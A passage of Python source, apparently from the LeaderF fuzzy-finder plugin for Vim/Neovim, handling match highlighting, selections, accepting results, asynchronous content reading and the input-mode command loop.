if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")""" % (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
for i, pos in enumerate(self._highlight_refine_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")""" % (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
if clear:
self._clearHighlights()
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
if use_fuzzy_engine:
self._highlight_pos = get_highlights(source=[getDigest(line)
for line in content[:highlight_number:unit]])
else:
# e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ]
# where [2, 3] indicates the highlight starts at the 2nd column with the
# length of 3 in bytes
self._highlight_pos = [get_highlights(getDigest(line))
for line in content[:highlight_number:unit]]
if self._cli.isAndMode:
self._highlight_pos_list.append(self._highlight_pos)
bottom = len(content)
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")""" % (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
def _highlightRefine(self, first_get_highlights, get_highlights):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
self._clearHighlights()
getDigest = self._getDigest
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
bottom = len(content)
self._highlight_pos = [first_get_highlights(getDigest(line, 1))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_match', %s)")""" % (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
self._highlight_refine_pos = [get_highlights(getDigest(line, 2))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_refine_pos):
start_pos = self._getDigestStartPos(content[unit*i], 2)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")""" % (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _regexFilter(self, iterable):
def noErrMatch(text, pattern):
try:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern))
except TypeError: # python 2
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except ValueError: # python 3
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
try:
if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))):
return iter([])
else:
return (line for line in iterable
if noErrMatch(escQuote(self._getDigest(line, 0)), escQuote(self._cli.pattern)))
except vim.error:
return iter([])
def _regexSearch(self, content, is_continue, step):
if not self._cli.isPrefix:
self._index = 0
self._result_content = self._filter(8000, self._regexFilter, content, is_continue)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def clearSelections(self):
for i in self._selections.values():
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % i)
self._selections.clear()
def _cleanup(self):
if not ("--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1'):
self._pattern_bak = self._cli.pattern
self._cli.clear()
self._clearHighlights()
self._clearHighlightsPos()
self._help_length = 0
self._show_help = False
@modifiableController
def toggleHelp(self):
self._show_help = not self._show_help
if self._getInstance().isReverseOrder():
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._createHelpHint()
self.clearSelections()
self._resetHighlights()
def _accept(self, file, mode, *args, **kwargs):
if file:
if mode == '':
pass
elif mode == 'h':
lfCmd("split")
elif mode == 'v':
lfCmd("bel vsplit")
kwargs["mode"] = mode
tabpage_count = len(vim.tabpages)
self._acceptSelection(file, *args, **kwargs)
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
self._issue_422_set_option()
if mode == 't' and len(vim.tabpages) > tabpage_count:
tab_pos = int(lfEval("g:Lf_TabpagePosition"))
if tab_pos == 0:
lfCmd("tabm 0")
elif tab_pos == 1:
lfCmd("tabm -1")
elif tab_pos == 3:
lfCmd("tabm")
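    # accept() handles <CR> and the split/tab variants: it skips past the help
    # lines, records the search history, opens either the current line or every
    # selected line via _accept(), restores the original working directory, and
    # returns None when the LeaderF window should close (False to keep it open).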
def accept(self, mode=''):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if self._getInstance().window.cursor[0] <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if self._getExplorer().getStlCategory() == "Rg" \
and self._getInstance().currentLine == self._getExplorer().getContextSeparator():
return
self._cli.writeHistory(self._getExplorer().getStlCategory())
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
cwd = os.getcwd()
if len(self._selections) > 0:
files = []
for i in sorted(self._selections.keys()):
files.append(self._getInstance().buffer[i-1])
if "--stayOpen" in self._arguments:
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = os.getcwd()
if mode == '':
self._accept(files[0], mode)
self._argaddFiles(files)
self._accept(files[0], mode)
else:
for file in files:
self._accept(file, mode)
if os.getcwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
need_exit = True
else:
file = self._getInstance().currentLine
line_nr = self._getInstance().window.cursor[0]
need_exit = self._needExit(file, self._arguments)
if need_exit:
if "--stayOpen" in self._arguments:
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = os.getcwd()
self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag
if os.getcwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
if need_exit:
self._setAutochdir()
if dir_changed_by_autocmd == False:
self._restoreOrigCwd()
return None
else:
self._beforeExit()
self._content = vim.current.buffer[:]
return False
def _jumpNext(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] > len(instance.buffer) - self._help_length:
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
elif instance.window.cursor[0] == 1: # at the first line
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow > len(instance.buffer) - instance.helpLength:
instance.cursorRow = len(instance.buffer) - instance.helpLength
elif instance.cursorRow == 1: # at the last line
instance.cursorRow = len(instance.buffer) - instance.helpLength
else:
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length:
instance.window.cursor = (self._help_length + 1, 0)
elif instance.window.cursor[0] == len(instance.buffer): # at the last line
instance.window.cursor = (self._help_length + 1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow <= instance.helpLength:
instance.cursorRow = instance.helpLength + 1
elif instance.cursorRow == len(instance.buffer): # at the last line
instance.cursorRow = instance.helpLength + 1
else:
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
return True
def _jumpPrevious(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] >= len(instance.buffer) - self._help_length:
instance.window.cursor = (1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow >= len(instance.buffer) - instance.helpLength:
instance.cursorRow = 1
else:
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(len(instance.buffer) - instance.cursorRow - instance.helpLength + 1, len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length + 1:
instance.window.cursor = (len(instance.buffer), 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
self._accept(instance.buffer[instance.window.cursor[0] - 1], "")
else:
if instance.cursorRow <= instance.helpLength + 1:
instance.cursorRow = len(instance.buffer)
else:
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "")
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
def quit(self):
self._getInstance().exitBuffer()
self._setAutochdir()
self._restoreOrigCwd()
def refresh(self, normal_mode=True):
self._getExplorer().cleanup()
content = self._getExplorer().getFreshContent()
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if normal_mode: # when called in Normal mode
self._getInstance().buffer.options['modifiable'] = True
self._clearHighlights()
self._clearHighlightsPos()
self.clearSelections()
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._iteration_end = True
if self._cli.pattern:
self._index = 0
self._search(self._content)
if normal_mode: # when called in Normal mode
self._createHelpHint()
self._resetHighlights()
self._getInstance().buffer.options['modifiable'] = False
def addSelections(self):
nr = self._getInstance().window.number
if self._getInstance().getWinPos() != 'popup':
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
line_nr = self._getInstance().window.cursor[0]
if line_nr <= self._help_length:
lfCmd("norm! j")
return
if line_nr in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (self._selections[line_nr], self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % self._selections[line_nr])
del self._selections[line_nr]
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), line_nr))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr))
self._selections[line_nr] = id
def selectMulti(self):
orig_line = self._getInstance().window.cursor[0]
nr = self._getInstance().window.number
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
cur_line = int(lfEval("v:mouse_lnum"))
self.clearSelections()
for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1):
if i > self._help_length and i not in self._selections:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i)))
self._selections[i] = id
def selectAll(self):
line_num = len(self._getInstance().buffer)
if line_num > 300:
lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE")
lfCmd("sleep 1")
return
for i in range(line_num):
if i >= self._help_length and i+1 not in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), i+1))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1)))
self._selections[i+1] = id
def _gotoFirstLine(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("normal! gg")
def startExplorer(self, win_pos, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
self.setArguments(arguments_dict)
self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly())
self._cli.setRefineFeature(self._supportsRefine())
if self._getExplorer().getStlCategory() in ["Gtags"]:
if "--update" in self._arguments or "--remove" in self._arguments:
self._getExplorer().getContent(*args, **kwargs)
return
if "--next" in arguments_dict:
if self._jumpNext() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
elif "--previous" in arguments_dict:
if self._jumpPrevious() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
self._cleanup()
if kwargs.get('bang', 0):
self._current_mode = 'NORMAL'
else:
self._current_mode = 'INPUT'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
# lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE")
self._getInstance().setArguments(self._arguments)
empty_query = self._empty_query and self._getExplorer().getStlCategory() in ["File"]
remember_last_status = "--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1' and self._cli.pattern
if remember_last_status:
content = self._content
self._getInstance().useLastReverseOrder()
win_pos = self._getInstance().getWinPos()
else:
content = self._getExplorer().getContent(*args, **kwargs)
self._getInstance().setCwd(os.getcwd())
if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \
and isinstance(content, list) and len(content) == 1:
mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else ""
self._accept(content[0], mode)
return
self._index = 0
pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0]
self._cli.setPattern(pattern)
self._result_content = []
self._cb_content = []
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if self._getExplorer().getStlCategory() in ["Rg"] and ("-A" in arguments_dict \
or "-B" in arguments_dict or "-C" in arguments_dict):
self._getInstance().ignoreReverse()
# clear the buffer only when the content is not a list
self._getInstance().enterBuffer(win_pos, not isinstance(content, list))
self._initial_count = self._getInstance().getInitialWinHeight()
self._getInstance().setStlCategory(self._getExplorer().getStlCategory())
self._setStlMode(**kwargs)
self._getInstance().setStlCwd(self._getExplorer().getStlCurDir())
self._getInstance().setPopupStl(self._current_mode)
if not remember_last_status:
self._gotoFirstLine()
self._start_time = time.time()
self._bang_start_time = self._start_time
self._status_start_time = self._start_time
self._bang_count = 0
self._read_content_exception = None
if isinstance(content, list):
self._is_content_list = True
self._read_finished = 2
if len(content[0]) == len(content[0].rstrip("\r\n")):
self._content = content
else:
self._content = [line.rstrip("\r\n") for line in content]
if not remember_last_status:
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content))
if not empty_query:
self._getInstance().setBuffer(self._content[:self._initial_count])
if lfEval("has('nvim')") == '1':
lfCmd("redrawstatus")
self._callback = self._workInIdle
if not kwargs.get('bang', 0):
self.input()
else:
if not remember_last_status and not empty_query:
self._getInstance().appendBuffer(self._content[self._initial_count:])
elif remember_last_status and len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
lfCmd("echo")
if self._cli.pattern:
self._cli._buildPrompt()
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
if not self._cli.pattern and empty_query:
self._gotoFirstLine()
self._guessSearch(self._content)
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
elif isinstance(content, AsyncExecutor.Result):
self._is_content_list = False
self._callback = self._workInIdle
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]:
if "--append" in self.getArguments():
self._offset_in_content = len(self._content)
if self._pattern_bak:
self._getInstance().setBuffer(self._content, need_copy=False)
self._createHelpHint()
else:
self._getInstance().clearBuffer()
self._content = []
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
self._stop_reader_thread = False
self._reader_thread = threading.Thread(target=self._readContent, args=(content,))
self._reader_thread.daemon = True
self._reader_thread.start()
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
else:
self._is_content_list = False
self._callback = partial(self._workInIdle, content)
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
def _readContent(self, content):
try:
for line in content:
self._content.append(line)
if self._stop_reader_thread:
break
else:
self._read_finished = 1
except Exception:
self._read_finished = 1
self._read_content_exception = sys.exc_info()
def _setResultContent(self):
if len(self._result_content) > len(self._getInstance().buffer):
self._getInstance().setBuffer(self._result_content)
elif self._index == 0:
self._getInstance().setBuffer(self._content, need_copy=True)
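    # _workInIdle is installed as self._callback and is invoked repeatedly while
    # LeaderF waits for input (or from a timer in bang mode): it drains lines
    # produced by the reader thread, updates the statusline totals and result
    # counts, and re-runs the fuzzy search incrementally in small steps.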
@catchException
def _workInIdle(self, content=None, bang=False):
if self._read_content_exception is not None:
if bang == True:
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
lfPrintError(self._read_content_exception[1])
return
else:
raise self._read_content_exception[1]
if self._is_content_list:
if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0):
if self._fuzzy_engine:
step = 40000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
return
if content:
i = -1
for i, line in enumerate(itertools.islice(content, 20)):
self._content.append(line)
if i == -1:
self._read_finished = 1
if self._read_finished > 0:
if self._read_finished == 1:
self._read_finished += 1
self._getExplorer().setContent(self._content)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlRunning(False)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
if bang:
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] != b'':
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
self._getInstance().setBuffer(self._content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._content))
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < len(self._content) or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 40000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
if bang:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
cur_len = len(self._content)
if time.time() - self._start_time > 0.1:
self._start_time = time.time()
self._getInstance().setStlTotal(cur_len//self._getUnit())
if time.time() - self._status_start_time > 0.45:
self._status_start_time = time.time()
self._getInstance().setStlRunning(True)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
else:
self._getInstance().setStlResultsCount(cur_len)
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < cur_len or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 40000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content[:cur_len], True, step)
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._getInstance().getWinPos() not in ('popup', 'floatwin') and time.time() - self._bang_start_time > 0.5:
self._bang_start_time = time.time()
lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count))
self._bang_count = (self._bang_count + 1) % 9
elif len(self._getInstance().buffer) < min(cur_len, self._initial_count):
self._getInstance().setBuffer(self._content[:self._initial_count])
@modifiableController
def input(self):
self._current_mode = 'INPUT'
self._getInstance().hideMimicCursor()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().getWinPos() == 'popup':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')"
% (self._getInstance().getPopupWinId(), 'leaderf#PopupFilter'))
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._hideHelp()
self._resetHighlights()
if self._cli.pattern: # --input xxx or from normal mode to input mode
if self._index == 0: # --input xxx
self._search(self._content)
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
for cmd in self._cli.input(self._callback):
cur_len = len(self._content)
cur_content = self._content[:cur_len]
if equal(cmd, '<Update>'):
if self._getInstance().getWinPos() == 'popup':
if self._getInstance()._window_object.cursor[0] > 1:
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
self._search(cur_content)
elif equal(cmd, '<Shorten>'):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Mode>'):
self._setStlMode()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
if self._cli.pattern:
self._search(cur_content)
elif equal(cmd, '<C-K>'):
self._toUp()
self._previewResult(False)
elif equal(cmd, '<C-J>'):
self._toDown()
self._previewResult(False)
elif equal(cmd, '<Up>'):
if self._cli.previousHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Down>'):
if self._cli.nextHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<LeftMouse>'):
if self._leftClick():
break
self._previewResult(False)
elif equal(cmd, '<2-LeftMouse>'):
self._leftClick()
if self.accept() is None:
break
elif equal(cmd, '<CR>'):
if self.accept() is None:
break
elif equal(cmd, '<C-X>'):
if self.accept('h') is None:
break
elif equal(cmd, '<C-]>'):
if self.accept('v') is None:
break
elif equal(cmd, '<C-T>'):
if self.accept('t') is None:
break
elif equal(cmd, '<Quit>'):
self._cli.writeHistory(self._getExplorer().getStlCategory())
self.quit()
break
elif equal(cmd, '<Tab>'): # switch to Normal mode
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._setResultContent()
self.clearSelections()
self._cli.hideCursor()
self._createHelpHint()
self._resetHighlights()
if self._getInstance().isReverseOrder() and self._cli.pattern \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
